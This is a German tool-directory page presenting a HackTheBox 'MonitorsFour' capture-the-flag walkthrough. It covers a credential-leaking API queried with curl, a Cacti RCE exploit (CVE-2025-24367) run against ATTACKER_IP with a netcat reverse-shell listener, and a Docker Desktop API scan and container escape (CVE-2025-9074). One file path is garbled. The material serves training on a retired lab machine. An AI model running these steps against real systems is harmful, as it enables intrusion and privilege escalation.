Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
monitorsfour — HackTheBox MonitorsFour Walkthrough über Credential-Leak, CVE-2025-24367 Cacti RCE und CVE-2025-9074 Docker Desktop API Container Escape zu Root. | Kitploit
Tools/GitHubGitHub/ledksv/monitorsfour
Passwort-CrackingAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationCTFPenetrationstestsLernen & BildungContainer-Ausbruch
GitHubledksv/monitorsfour

monitorsfour

vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

HackTheBox MonitorsFour Walkthrough über Credential-Leak, CVE-2025-24367 Cacti RCE und CVE-2025-9074 Docker Desktop API Container Escape zu Root.

Repository anzeigen

MonitorsFour — HackTheBox

Plattform: HackTheBox OS: Windows Status: Retired — vollständiger Walkthrough veröffentlicht.

Vollständiger Walkthrough: l3dsec.com/walkthroughs/monitorsfour-htb


Angriffskette

root@kitploit:~
Nmap → nginx (80) + WinRM (5985)
  → ffuf → cacti.monitorsfour.htb (Cacti)
    → nicht authentifizierter API-Endpunkt → Anmeldedaten
      → CVE-2025-24367 Cacti RCE → Shell als www-data (Docker)
        → CVE-2025-9074 Docker Desktop API (192.168.65.x:2375)
          → Host-Dateisystem einbinden → root-Flag

1. Enumeration

root@kitploit:~
nmap -sV -sC <TARGET_IP>
nmap -sV -sC <TARGET_IP> -p-
root@kitploit:~
PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)

Virtual-Host-Fuzzing ergab cacti.monitorsfour.htb — eine Cacti-Netzwerküberwachungsinstanz.


2. Ermittlung von Anmeldedaten

Ein nicht authentifizierter API-Endpunkt auf der Hauptdomain gibt Benutzerkontodaten einschließlich MD5-Passwort-Hashes preis:

root@kitploit:~
curl -s "http://monitorsfour.htb/user?token=0"

MD5-Hash sofort geknackt — liefert gültige Anmeldedaten für Cacti.


3. Erster Fußabdruck — CVE-2025-24367 (Cacti Authenticated RCE)

Cacti-Instanz anfällig für authentifizierte RCE über die Graph-Template-Funktionalität:

root@kitploit:~
nc -lvnp 9001

sudo python3 exploit.py \
  -url http://cacti.monitorsfour.htb \
  -u marcus \
  -p <password> \
  -i <ATTACKER_IP> \
  -l 9001

Shell als www-data in einem Docker-Container. User-Flag unter /home/marcus/user.txt.


4. Container-Escape — CVE-2025-9074 (Docker Desktop API)

Docker-Socket nicht eingebunden. Docker Desktop stellt seine Engine-API unauthentifiziert im internen Subnetz 192.168.65.0/24 bereit:

root@kitploit:~
# Scan for open Docker API
for i in $(seq 1 254); do
  (curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2>/dev/null \
    | grep -q "ApiVersion" && echo "192.168.65.$i:2375 OPEN") &
done; wait

Erstellte einen Container über die API, der das Host-Laufwerk C:\ einbindet, und las dann das root-Flag aus C:sers\Administrator\Desktop oot.txt.


Flags

FlagWert
Userredacted
Rootredacted

Nur für Bildungszwecke. Testen Sie nur Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

Tool herunterladen